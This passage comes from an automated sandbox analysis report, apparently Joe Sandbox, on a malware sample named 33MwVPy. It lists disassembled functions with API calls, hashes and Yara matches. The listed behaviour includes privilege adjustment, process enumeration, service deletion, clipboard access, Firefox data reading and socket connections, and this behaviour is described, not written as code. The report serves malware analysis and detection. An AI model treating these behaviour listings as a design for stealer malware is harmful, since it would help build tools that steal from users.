                                • Instruction Fuzzy Hash: A3F0FC33740316B7D620C58AAC85FD7B799E785755F0140AAF70C9F180DBE2984187D4
                                Function 10020310 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,10081068), ref: 10020361
                                  • Part of subcall function 10020580: LoadLibraryW.KERNEL32(100783F4,10081068,?,?,?,?,1002037D), ref: 100205B5
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: EventLibraryLoad
                                • String ID:
                                • API String ID: 298091905-0
                                • Opcode ID: 3b4ecae4166f1dad3b18585e05198afbb3260a52d15318504b17a8d368628590
                                • Instruction ID: e8bd7fe2e6ec80928e3e5f9c2cc51210f5708b32cd840354af321c6057caa1aa
                                • Opcode Fuzzy Hash: 3b4ecae4166f1dad3b18585e05198afbb3260a52d15318504b17a8d368628590
                                • Instruction Fuzzy Hash: 1E01B572D04748EBDB01CF98DD417DEF7B9FF1A214F108316F840B2251EB366A808A50
                                Function 6C2F24FA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: __fsopen
                                • String ID:
                                • API String ID: 3646066109-0
                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                • Instruction ID: f17e01feb4ecd3e388879ee24a1619d8b34b3dbb782ab1bacf05af58d4a2db79
                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                • Instruction Fuzzy Hash: DFC09BB254114C77CF111A42EC05E557F199BC1664F444010FF1C1956096B3DD659585

                                Non-executed Functions

                                Function 03319554 Relevance: 87.9, APIs: 49, Strings: 1, Instructions: 437stringmemoryprocessCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,?,?,00000124), ref: 033195D8
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000124), ref: 033195DF
                                • LookupPrivilegeValueA.ADVAPI32 ref: 0331960E
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 03319628
                                • GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 0331962E
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 03319638
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03319642
                                • LocalAlloc.KERNEL32 ref: 03319676
                                • Process32First.KERNEL32(?,?), ref: 03319693
                                • OpenProcess.KERNEL32(00000410,00000000,00000128), ref: 033196AF
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 033196E6
                                • K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 033196FA
                                • lstrcpy.KERNEL32(?,100789F8), ref: 03319711
                                • lstrcat.KERNEL32(?,100789F8), ref: 0331973B
                                • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033197A6
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033197CE
                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033197DF
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033197FB
                                • LookupAccountSidA.ADVAPI32(00000000,?,00000000,?), ref: 0331984B
                                • LookupAccountSidA.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 03319890
                                • lstrcpy.KERNEL32(?,?), ref: 033198AA
                                • GlobalFree.KERNEL32(00000000), ref: 033198B5
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 033198C4
                                • lstrcpy.KERNEL32(?,100789FC), ref: 033198EB
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 03319902
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 03319912
                                • LocalSize.KERNEL32(?), ref: 03319928
                                • LocalReAlloc.KERNEL32(?,?,00000042,?,?,?,?,?,?,?,00000040,00000400), ref: 0331993A
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,00000040,00000400), ref: 03319955
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 03319973
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 03319986
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033199AE
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040,00000400), ref: 033199C9
                                • lstrlen.KERNEL32(?), ref: 033199ED
                                • K32GetProcessMemoryInfo.KERNEL32 ref: 03319A2B
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 03319A80
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 03319A92
                                • CloseHandle.KERNEL32(?), ref: 03319AA1
                                • CloseHandle.KERNEL32(00000000), ref: 03319ABB
                                • Process32Next.KERNEL32(?,?), ref: 03319ACA
                                • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 03319AE0
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 03319AEF
                                • OpenProcessToken.ADVAPI32(00000000), ref: 03319AF6
                                • LookupPrivilegeValueA.ADVAPI32 ref: 03319B25
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 03319B3F
                                • GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 03319B45
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 03319B4F
                                • CloseHandle.KERNEL32(?), ref: 03319B59
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$lstrlen$Token$CloseHandle$AllocLocalLookupOpen$Filelstrcpy$AccountAdjustCreateCurrentErrorGlobalInformationLastPrivilegePrivilegesProcess32SizeValue$EnumFirstFreeImageInfoMemoryModulesNameNextSnapshotToolhelp32lstrcat
                                • String ID: (
                                • API String ID: 984035923-3887548279
                                • Opcode ID: a28dabb6dd635c73833fb31693717e53820e9280286f9fbae54fa11eb23399b8
                                • Instruction ID: dcd76212a9b79cec3d129542de0f6405be693ea188da8e2772abbccf0294baf8
                                • Opcode Fuzzy Hash: a28dabb6dd635c73833fb31693717e53820e9280286f9fbae54fa11eb23399b8
                                • Instruction Fuzzy Hash: 04F15C71504361AFE720DFA0CC88F9BBBEEAF84701F050919FA85D6190EBB0D558CB92
                                Function 0331E374 Relevance: 56.6, APIs: 37, Instructions: 1121stringfileprocessCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(?), ref: 0331E3F1
                                • lstrcat.KERNEL32(?,1007918C), ref: 0331E403
                                • CreateDirectoryA.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,0331F5F7), ref: 0331E40C
                                • GetLastError.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,0331F5F7), ref: 0331E416
                                • FindFirstFileA.KERNEL32(?,?,?,00000000,?,100628E0,000000FF,?,?,?,0331F5F7), ref: 0331E435
                                • lstrcpy.KERNEL32(?,?), ref: 0331E479
                                • lstrcat.KERNEL32(?,10078558), ref: 0331E48B
                                • lstrcat.KERNEL32(?,?), ref: 0331E49F
                                • lstrcpy.KERNEL32(?,?), ref: 0331E4C8
                                • lstrcat.KERNEL32(?,10078558), ref: 0331E4DA
                                • lstrcat.KERNEL32(?,?), ref: 0331E4EE
                                • lstrcmp.KERNEL32(?,100785A8), ref: 0331E509
                                • lstrcmp.KERNEL32(?,100785AC), ref: 0331E51F
                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0331E532
                                • GetLastError.KERNEL32 ref: 0331E53C
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 0331E573
                                • _strstr.LIBCMT ref: 0331E58D
                                • _strstr.LIBCMT ref: 0331E5A5
                                  • Part of subcall function 0330E934: __CxxThrowException@8.LIBVCRUNTIME ref: 0330E961
                                  • Part of subcall function 0330E934: __CxxThrowException@8.LIBVCRUNTIME ref: 0330E9A0
                                  • Part of subcall function 0330E934: ___std_exception_copy.LIBVCRUNTIME ref: 0330E9D3
                                • CreateFileA.KERNEL32(100791A4,80000000,00000003,00000000,00000003,00000000,00000000,1002A180,00000000,00000000,00000000,?), ref: 0331E7E6
                                • CreatePipe.KERNEL32(?,?,?,00000000), ref: 0331E87D
                                • CreateProcessA.KERNEL32(?,?,00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?), ref: 0331E915
                                • _strstr.LIBCMT ref: 0331EAFA
                                • _strstr.LIBCMT ref: 0331EB21
                                • __alldvrm.LIBCMT ref: 0331EC0B
                                • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000,00000001,?,?,?,00000000), ref: 0331EC7B
                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 0331EC92
                                • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?), ref: 0331EE09
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 0331EE7D
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0331EEA5
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,00000000,?), ref: 0331EF3D
                                • _strstr.LIBCMT ref: 0331EFEA
                                • _strstr.LIBCMT ref: 0331F00A
                                • __alldvrm.LIBCMT ref: 0331F0F8
                                • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 0331F168
                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 0331F17F
                                • FindNextFileA.KERNEL32(?,00000010), ref: 0331F2E1
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0331F3DB
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Create$_strstr$lstrcat$Read$lstrcpy$DirectoryErrorException@8FindLastPipePointerProcessThrow__alldvrmlstrcmp$CopyFirstIos_base_dtorNext___std_exception_copystd::ios_base::_
                                • String ID:
                                • API String ID: 785693070-0
                                • Opcode ID: e169f5c97fcf3e746b80c9ca331f405be28e64603ffdac77077d966a12e1af83
                                • Instruction ID: a07561c2e18e89bb1994905ffe31a2bca6a062ee6435c738a54fd7126bc4bf4e
                                • Opcode Fuzzy Hash: e169f5c97fcf3e746b80c9ca331f405be28e64603ffdac77077d966a12e1af83
                                • Instruction Fuzzy Hash: ACA2D371D002699FEB24CF24CC98BEDBBB9EF45304F5441E9E909A7240EB719A95CF50
                                Function 0331C236 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 125stringservicememoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,00000400), ref: 0331C247
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 0331C285
                                • OpenServiceA.ADVAPI32(00000000,00000002,000F01FF), ref: 0331C295
                                • GetLastError.KERNEL32 ref: 0331C2A0
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0331C2AB
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 0331C2BE
                                • DeleteService.ADVAPI32(00000000), ref: 0331C2C5
                                • CloseServiceHandle.ADVAPI32(?), ref: 0331C2D0
                                • CloseServiceHandle.ADVAPI32(?), ref: 0331C2D9
                                • Sleep.KERNEL32(00000064), ref: 0331C2E1
                                • lstrlen.KERNEL32(00000002), ref: 0331C2EC
                                • LocalSize.KERNEL32(00000000), ref: 0331C2F9
                                • lstrlen.KERNEL32(00000002,00000042), ref: 0331C306
                                • LocalReAlloc.KERNEL32(00000000,00000000), ref: 0331C313
                                • lstrlen.KERNEL32(00000002), ref: 0331C321
                                • lstrlen.KERNEL32(00000002), ref: 0331C336
                                • lstrlen.KERNEL32(00000002), ref: 0331C346
                                • LocalFree.KERNEL32(00000000,00000000,00000002), ref: 0331C389
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$lstrlen$Local$AllocCloseHandleOpen$ControlDeleteErrorFreeLastManagerQuerySizeSleepStatus
                                • String ID: PRuRu
                                • API String ID: 3563768080-110056376
                                • Opcode ID: 0391d744d96b257056696178bf37992bb69996d0c93afbe8610ab68b20283cc8
                                • Instruction ID: 814eb2759214ccea5c3d806a889ce134443c3f2b154c1787b0ccb57bd75b48e3
                                • Opcode Fuzzy Hash: 0391d744d96b257056696178bf37992bb69996d0c93afbe8610ab68b20283cc8
                                • Instruction Fuzzy Hash: AA413B72D40224AFEB15DFA4DCC8AAEBBBAEF49711F154019FA06B7250CBB45911CB60
                                Function 0331F744 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 198stringfileprocessCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0331F77F
                                • lstrcpy.KERNEL32(?,?), ref: 0331F7BD
                                • CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 0331F7E7
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0331F7FB
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0331F81D
                                • _strstr.LIBCMT ref: 0331F82D
                                • _strstr.LIBCMT ref: 0331F84C
                                • _strstr.LIBCMT ref: 0331F864
                                • lstrcpy.KERNEL32(?,?), ref: 0331F8A7
                                • lstrcpy.KERNEL32(?,?), ref: 0331F8D3
                                • lstrcpy.KERNEL32(?,10079264), ref: 0331F919
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0331F9EA
                                • CloseHandle.KERNEL32(00000000), ref: 0331F9F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$File_strstr$Create$CloseFolderHandlePathProcessReadSize
                                • String ID: 1$D$firefox.exe
                                • API String ID: 4099344064-3475012443
                                • Opcode ID: 36fc82434552750bc1a3b88f3c62956fe40749c54785bf96c7c74c9ac57cd5e6
                                • Instruction ID: 656c875b2daff894a6f42ed51ff2520a503838791a08c2c9720cce11137e4163
                                • Opcode Fuzzy Hash: 36fc82434552750bc1a3b88f3c62956fe40749c54785bf96c7c74c9ac57cd5e6
                                • Instruction Fuzzy Hash: 7C7145B2D4076C6ADB20DBA0CC95FDE77BCAB49701F441195F609E6180EBB4AB84CF94
                                Function 03314474 Relevance: 25.9, APIs: 17, Instructions: 400networkstringthreadCOMMON
                                Download Yara Rule
                                APIs
                                • send.WS2_32(?,?,?,00000000), ref: 033144FF
                                • GetLastError.KERNEL32 ref: 0331452F
                                • RtlEnterCriticalSection.NTDLL(?), ref: 0331455D
                                • shutdown.WS2_32(?,00000002), ref: 03314572
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 03314579
                                • lstrcpy.KERNEL32(?,?), ref: 033145DA
                                • lstrlen.KERNEL32(?), ref: 033145E7
                                • gethostbyname.WS2_32(?), ref: 033145FF
                                • GetLastError.KERNEL32 ref: 03314609
                                • CreateThread.KERNEL32(00000000,00000000,100226D0,?,00000000,00000000), ref: 03314673
                                • socket.WS2_32(00000002,00000001,00000006), ref: 0331476E
                                • GetLastError.KERNEL32 ref: 03314784
                                • connect.WS2_32(?,?,00000010), ref: 033147F3
                                • getsockname.WS2_32(?,?,?), ref: 03314828
                                • select.WS2_32(00000000,?,00000000,00000000,?), ref: 0331493B
                                • recv.WS2_32(?,?,00004FFB,00000000), ref: 03314965
                                • GetLastError.KERNEL32 ref: 0331499F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$CriticalSection$CreateEnterLeaveThreadconnectgethostbynamegetsocknamelstrcpylstrlenrecvselectsendshutdownsocket
                                • String ID:
                                • API String ID: 1762070719-0
                                • Opcode ID: 4f4e7085a7550f1efc01a4d81cd6686ba2831fb91f6368293ba2cd3388519968
                                • Instruction ID: 69235982c76275cbe7bb871f2b3bb503ee3eac812ebbdde8fadff59f8b12ca85
                                • Opcode Fuzzy Hash: 4f4e7085a7550f1efc01a4d81cd6686ba2831fb91f6368293ba2cd3388519968
                                • Instruction Fuzzy Hash: 2BF19475A006289FDB24DF64CC84BEEB7B5EF09311F4441EAE509EB291DB709AA4CF50
                                Function 0331A3C4 Relevance: 21.3, APIs: 14, Instructions: 337filesleepmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0331A47A
                                • FindClose.KERNEL32(00000000), ref: 0331A5B0
                                • RemoveDirectoryA.KERNEL32(?), ref: 0331A5BC
                                • Sleep.KERNEL32(00000001,?,?), ref: 0331A62F
                                • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 0331A64C
                                • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0331A661
                                • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 0331A690
                                • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0331A6A7
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0331A6D6
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0331A705
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 0331A77A
                                • LocalFree.KERNEL32(00000000,00000000,00000001), ref: 0331A7A1
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 0331A7B7
                                • Sleep.KERNEL32(000001F4,?,?), ref: 0331A7C2
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateFindLocalSizeSleep$AllocDirectoryFirstFreeHandlePointerReadRemove
                                • String ID:
                                • API String ID: 2870245554-0
                                • Opcode ID: 004efe348f404fcf56c77240fffa8d173da0c728ae201aa1ab3d49cd3ecfa646
                                • Instruction ID: e984c85e48e4156ddb5636c955bed69fad959399470420833bdde4a93a400066
                                • Opcode Fuzzy Hash: 004efe348f404fcf56c77240fffa8d173da0c728ae201aa1ab3d49cd3ecfa646
                                • Instruction Fuzzy Hash: 8FC18A71D012149FEB19CB78CCC8FEEBB75EF46311F048258E545AB291EB74AA94C760
                                Function 03315134 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 266filememorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 033151AC
                                • FindFirstFileA.KERNEL32(?,?), ref: 03315200
                                • lstrcpy.KERNEL32(?,?), ref: 03315230
                                • _strstr.LIBCMT ref: 03315394
                                • LocalAlloc.KERNEL32(00000040,00000400), ref: 033153AB
                                • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 03315419
                                • LocalSize.KERNEL32(00000000), ref: 03315422
                                • Sleep.KERNEL32(0000000A,00000000,00000000), ref: 03315433
                                • LocalFree.KERNEL32(00000000), ref: 0331543A
                                • FindNextFileA.KERNEL32(?,00000010), ref: 03315452
                                • FindClose.KERNEL32(?), ref: 0331546D
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Find$AllocFilelstrcpy$CloseFirstFreeNextSizeSleep_strstr
                                • String ID: \
                                • API String ID: 2400463266-2967466578
                                • Opcode ID: f66c6cc243d9cb25547b093a43cf195a18772cac0588092ebbf5cc2cdaef0695
                                • Instruction ID: 7644bc91e6b16138f3089e4f66dbfc8794c10c564c2d72efbd87481be198abd2
                                • Opcode Fuzzy Hash: f66c6cc243d9cb25547b093a43cf195a18772cac0588092ebbf5cc2cdaef0695
                                • Instruction Fuzzy Hash: 1EA105765083859BE725CF20CCD4BABBFEAAF87204F0C4859E985C7241EB72D519CB52
                                Function 0331E024 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 137clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 0331E042
                                • EmptyClipboard.USER32 ref: 0331E050
                                • GlobalAlloc.KERNEL32(00002000,?), ref: 0331E060
                                • GlobalFix.KERNEL32(00000000), ref: 0331E06C
                                • GlobalUnWire.KERNEL32(00000000), ref: 0331E082
                                • SetClipboardData.USER32(00000001,00000000), ref: 0331E08B
                                • CloseClipboard.USER32 ref: 0331E091
                                • OpenClipboard.USER32(00000000), ref: 0331E0A8
                                • GetClipboardData.USER32(00000001), ref: 0331E0B8
                                • GlobalFix.KERNEL32(00000000), ref: 0331E0BF
                                • CloseClipboard.USER32 ref: 0331E183
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataOpen$AllocEmptyWire
                                • String ID: NULL
                                • API String ID: 1263324636-324932091
                                • Opcode ID: 0d61714ba7b5f0c40e36a24a6666119437ac47073f95aa2b9919093933bbc768
                                • Instruction ID: 43f1a42e4ceb706b88a6236750a693f345b4fcc9d447d7b60db757e4a7a69eb2
                                • Opcode Fuzzy Hash: 0d61714ba7b5f0c40e36a24a6666119437ac47073f95aa2b9919093933bbc768
                                • Instruction Fuzzy Hash: E4410D3A500211AFDB15DF74CCD8AB9BFBAEF4620070A81A5ED89C7201DE72D515C7A1
                                Function 03316754 Relevance: 12.2, APIs: 8, Instructions: 159filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(?,?), ref: 0331679E
                                • FindClose.KERNEL32(00000000), ref: 03316812
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0331682D
                                • Sleep.KERNEL32(000001F4), ref: 0331685D
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0331687E
                                • CloseHandle.KERNEL32(00000000), ref: 0331688A
                                • GetLastError.KERNEL32 ref: 033168C7
                                • wsprintfA.USER32 ref: 033168DE
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateFind$ErrorFirstHandleLastSleepwsprintf
                                • String ID:
                                • API String ID: 1612440928-0
                                • Opcode ID: a738804051aae24c5bbcc3fd3c791024bc3125db354225e8ee79e76875e4e62b
                                • Instruction ID: 1a96411f2d4276d374afbcdff36acb1b451549ba465b8afd0c0d1f1b18e007a8
                                • Opcode Fuzzy Hash: a738804051aae24c5bbcc3fd3c791024bc3125db354225e8ee79e76875e4e62b
                                • Instruction Fuzzy Hash: FA510971900718ABEB24CFA4CCC5FEAB7ADEB09312F0401A5FA1997181DBB0A9948F51
                                Function 0331E194 Relevance: 12.1, APIs: 8, Instructions: 133filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(?), ref: 0331E1D8
                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0331E1F5
                                • FindFirstFileA.KERNEL32(?,?,?,00000000), ref: 0331E220
                                • lstrcpy.KERNEL32(?,?), ref: 0331E267
                                • lstrcpy.KERNEL32(?,?), ref: 0331E2AE
                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 0331E308
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 0331E33E
                                • FindNextFileA.KERNEL32(?,00000010,?,?,?,?,00000000), ref: 0331E351
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$CreateDirectoryFind$CopyFirstNext
                                • String ID:
                                • API String ID: 835149165-0
                                • Opcode ID: 77aedc97e93624aef47b8c90961bcf6f8e77edd8025c5bd26e43d9dec195334e
                                • Instruction ID: 4628d365feccc6a88a9edf9cd0998665b11ab828cea9cb62b3053d5e7011185c
                                • Opcode Fuzzy Hash: 77aedc97e93624aef47b8c90961bcf6f8e77edd8025c5bd26e43d9dec195334e
                                • Instruction Fuzzy Hash: 6D4140B1D0022DAADB25EBA1CCC9FDA77BDAB08700F4405E5F608E2051EB759B85CF55
                                Function 033150DA Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 204filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 033151AC
                                • FindFirstFileA.KERNEL32(?,?), ref: 03315200
                                • lstrcpy.KERNEL32(?,?), ref: 03315230
                                • FindNextFileA.KERNEL32(?,00000010), ref: 03315452
                                • FindClose.KERNEL32(?), ref: 0331546D
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Filelstrcpy$CloseFirstNext
                                • String ID: \
                                • API String ID: 2320248173-2967466578
                                • Opcode ID: 8d1b2d146f69b6c0fd752457c3c36198768d013341a74cc3a1b004eb02ba799b
                                • Instruction ID: af276e918c7f509e57f73e786292bf2ead2ad51c6e587e71e32b59134a5d7f11
                                • Opcode Fuzzy Hash: 8d1b2d146f69b6c0fd752457c3c36198768d013341a74cc3a1b004eb02ba799b
                                • Instruction Fuzzy Hash: 3371D1725083859FDB26CF60CCD4BEBBFAAAF87304F080899E5C48B151D736951ACB52
